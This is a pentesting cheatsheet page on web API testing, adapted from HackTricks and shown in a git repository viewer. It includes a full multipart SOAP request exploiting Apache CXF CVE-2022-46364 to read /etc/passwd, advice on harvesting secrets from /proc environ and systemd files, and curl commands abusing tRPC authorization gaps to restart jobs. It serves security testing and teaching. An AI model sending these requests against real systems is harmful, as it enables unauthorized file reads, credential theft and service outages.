daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

web-api-pentesting.md (11646B)


      1 ---
      2 title: "Web API Pentesting"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/web-api-pentesting.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/web-api-pentesting.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Web API Pentesting
     14 
     15 ## API Pentesting Methodology Summary
     16 
     17 Pentesting APIs involves a structured approach to uncovering vulnerabilities. This guide encapsulates a comprehensive methodology, emphasizing practical techniques and tools.<sup>[[1]](#references)</sup>
     18 
     19 ### **Understanding API Types**
     20 
     21 - **SOAP/XML Web Services**: WSDL describes services, operations, bindings, and endpoints and is often exposed through a `?wsdl` URL. Tools such as **SoapUI** and Burp's **Wsdler** extension can parse it and generate baseline requests.
     22 - **REST-style HTTP APIs**: JSON is common but not required. Look for an **OpenAPI** document (`openapi.json`, `swagger.json`, `/api-docs`) and render it with Swagger UI or import it into an HTTP client. WADL exists but is far less common in current deployments.<sup>[[6]](#references)[[11]](#references)</sup>
     23 - **GraphQL**: A query language for APIs offering a complete and understandable description of the data in your API.
     24 
     25 ### **Practice Labs**
     26 
     27 - [**VAmPI**](https://github.com/erev0s/VAmPI): A deliberately vulnerable API for hands-on practice, covering the OWASP top 10 API vulnerabilities.
     28 - [**DNE Online Calculator**](http://www.dneonline.com/calculator.asmx): A public SOAP calculator whose `?WSDL` document is useful for practicing WSDL import and baseline request generation. It is a third-party demonstration service, not an intentionally vulnerable target, so keep testing to its documented operations.<sup>[[13]](#references)</sup>
     29 
     30 ### **Effective Tricks for API Pentesting**
     31 
     32 - **SOAP/XML Vulnerabilities**: Explore XXE vulnerabilities, although DTD declarations are often restricted. CDATA tags may allow payload insertion if the XML remains valid.
     33 - **Privilege Escalation**: Test endpoints with varying privilege levels to identify unauthorized access possibilities.
     34 - **CORS Misconfigurations**: Check whether untrusted origins can make credentialed requests **and read the response**. CORS and CSRF are related browser trust boundaries but are not interchangeable: CSRF can trigger a state change without response access, while exploitable CORS can expose response data to attacker-controlled JavaScript.<sup>[[7]](#references)</sup>
     35 - **Endpoint Discovery**: Leverage API patterns to discover hidden endpoints. Tools like fuzzers can automate this process.
     36 - **Parameter Tampering**: Experiment with adding or replacing parameters in requests to access unauthorized data or functionalities.
     37 - **HTTP Method Testing**: Vary request methods (GET, POST, PUT, DELETE, PATCH) to uncover unexpected behaviors or information disclosures.
     38 - **Content-Type Manipulation**: Switch between different content types (x-www-form-urlencoded, application/xml, application/json) to test for parsing issues or vulnerabilities.
     39 - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing.
     40 - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions.
     41 
     42 ### Apache CXF MTOM/XOP `xop:Include` as file-read / SSRF primitive
     43 
     44 If a SOAP service uses **Apache CXF** with **MTOM/XOP** enabled, test whether a parameter accepts an inline `xop:Include` element inside a **`multipart/related`** request whose root part is **`application/xop+xml`**. Apache's advisory for **CVE-2022-46364** states vulnerable versions parse the `href` of `XOP:Include` in MTOM requests and can perform SSRF-style fetches.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
     45 
     46 Why this matters in practice:
     47 
     48 - Many testers try only plain `text/xml` SOAP bodies and miss that the vulnerable code path is reached only after switching to **MIME multipart + XOP**.
     49 - If the application **reflects** the affected parameter in the SOAP response, the SSRF primitive can become **arbitrary local file read** by using `file://`.
     50 - Even without reflection, `http://`/`https://` targets can still be useful for **blind SSRF** against internal services.
     51 
     52 Minimal structure to adapt to the target operation:
     53 
     54 ```http
     55 POST /service HTTP/1.1
     56 Content-Type: multipart/related; type="application/xop+xml"; start="<root.message@cxf.apache.org>"; boundary="MIME_boundary"
     57 
     58 --MIME_boundary
     59 Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
     60 Content-ID: <root.message@cxf.apache.org>
     61 
     62 <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
     63                xmlns:xop="http://www.w3.org/2004/08/xop/include">
     64   <soap:Body>
     65     <ns:OPERATION xmlns:ns="http://target/">
     66       <ns:PARAM><xop:Include href="file:///etc/passwd"/></ns:PARAM>
     67     </ns:OPERATION>
     68   </soap:Body>
     69 </soap:Envelope>
     70 --MIME_boundary--
     71 ```
     72 
     73 Practical triage:
     74 
     75 1. Identify CXF version from the JAR, error pages, banners, or decompiled service artifacts.
     76 2. Generate a valid SOAP request first (`?wsdl`, SoapUI, Burp WSDLer, traced client, decompiled stubs).
     77 3. Convert the request to **`multipart/related`** and replace a parameter value with `xop:Include`.
     78 4. Test `file:///etc/passwd` for reflection-based reads and `http://<collaborator>` for SSRF.
     79 
     80 After obtaining local file read, high-value targets often include:
     81 
     82 - **systemd units** in `/etc/systemd/system/` and `/lib/systemd/system/` for `ExecStart=`, `EnvironmentFile=`, usernames, bind addresses, and credentials passed on the command line
     83 - **`/proc/<pid>/cmdline`** to recover full launch arguments of interesting services
     84 - **`/proc/<pid>/environ`** to recover secrets injected as environment variables
     85 - service-specific config, env, or wrapper scripts referenced by the unit file
     86 
     87 ### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls
     88 
     89 Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`.<sup>[[2]](#references)</sup>
     90 
     91 - Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control).
     92 - Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability.
     93 - Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`.
     94 
     95 Example vulnerable pattern (no role/permission gate):
     96 
     97 ```text
     98 // The endpoint for retrying a migration job
     99 // This checks for a valid session (authentication)
    100 retry: protectedProcedure
    101   // but not for an admin role (authorization).
    102   .input(z.object({ name: z.string() }))
    103   .mutation(async ({ input, ctx }) => {
    104     // Logic to restart a sensitive migration
    105   }),
    106 ```
    107 
    108 Practical exploitation (black-box)
    109 
    110 1) Register a normal account and obtain an authenticated session (cookies/headers).
    111 2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures.
    112 
    113 ```bash
    114 curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \
    115   -H 'Content-Type: application/json' \
    116   -b '<AUTH_COOKIES>' \
    117   --data '{"input":{}}'
    118 ```
    119 
    120 3) Invoke privileged actions such as restarting a job:
    121 
    122 ```bash
    123 curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \
    124   -H 'Content-Type: application/json' \
    125   -b '<AUTH_COOKIES>' \
    126   --data '{"input":{"name":"<migration_name>"}}'
    127 ```
    128 
    129 Impact to assess
    130 
    131 - Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics).
    132 - DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages.
    133 
    134 ### **Tools and Resources for API Pentesting**
    135 
    136 - **Kiterunner** discovers API routes and parameters using compiled route wordlists:<sup>[[8]](#references)</sup>
    137 
    138 ```bash
    139 kr scan https://domain.com/api/ -w routes-large.kite -x 20
    140 kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20
    141 kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0
    142 kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
    143 ```
    144 
    145 - **sj** audits exposed Swagger/OpenAPI definitions for weak authentication and generates command templates for manual testing.<sup>[[9]](#references)</sup>
    146 - **Postman** can import OpenAPI definitions from a file, URL, raw JSON/YAML, or a repository and generate a request collection, which is useful for preserving and replaying a discovered API surface.<sup>[[12]](#references)</sup>
    147 - Additional tools like **automatic-api-attack-tool**, **Astra**, and **restler-fuzzer** offer tailored functionalities for API security testing, ranging from attack simulation to fuzzing and vulnerability scanning.
    148 - **Cherrybomb** performs API-security checks from an OpenAPI Specification document.<sup>[[10]](#references)</sup>
    149 
    150 ### **Learning and Practice Resources**
    151 
    152 - **OWASP API Security Top 10**: Essential reading for understanding common API vulnerabilities ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)).
    153 - **API Security Checklist**: A comprehensive checklist for securing APIs ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)).
    154 - **Logger++ Filters**: For hunting API vulnerabilities, Logger++ offers useful filters ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)).
    155 - **API Endpoints List**: A curated list of potential API endpoints for testing purposes ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)).
    156 
    157 ## References
    158 
    159 - [1] [API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
    160 - [2] [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study)
    161 - [3] [Apache CXF advisory for CVE-2022-46364](https://cxf.apache.org/security-advisories.data/CVE-2022-46364.txt)
    162 - [4] [Apache CXF security advisories](https://cxf.apache.org/security-advisories.html)
    163 - [5] [0xdf - HTB DevArea](https://0xdf.gitlab.io/2026/07/04/htb-devarea.html)
    164 - [6] [OpenAPI Specification](https://spec.openapis.org/oas/latest.html)
    165 - [7] [MDN - Cross-Origin Resource Sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS)
    166 - [8] [Assetnote - Kiterunner](https://github.com/assetnote/kiterunner)
    167 - [9] [BishopFox - sj](https://github.com/BishopFox/sj)
    168 - [10] [BLST Security - Cherrybomb](https://github.com/blst-security/cherrybomb)
    169 - [11] [Swagger UI](https://swagger.io/tools/swagger-ui/)
    170 - [12] [Postman Docs – Integrate Postman with OpenAPI](https://learning.postman.com/docs/integrations/available-integrations/working-with-openAPI/)
    171 - [13] [DNE Online - Calculator SOAP service](http://www.dneonline.com/calculator.asmx)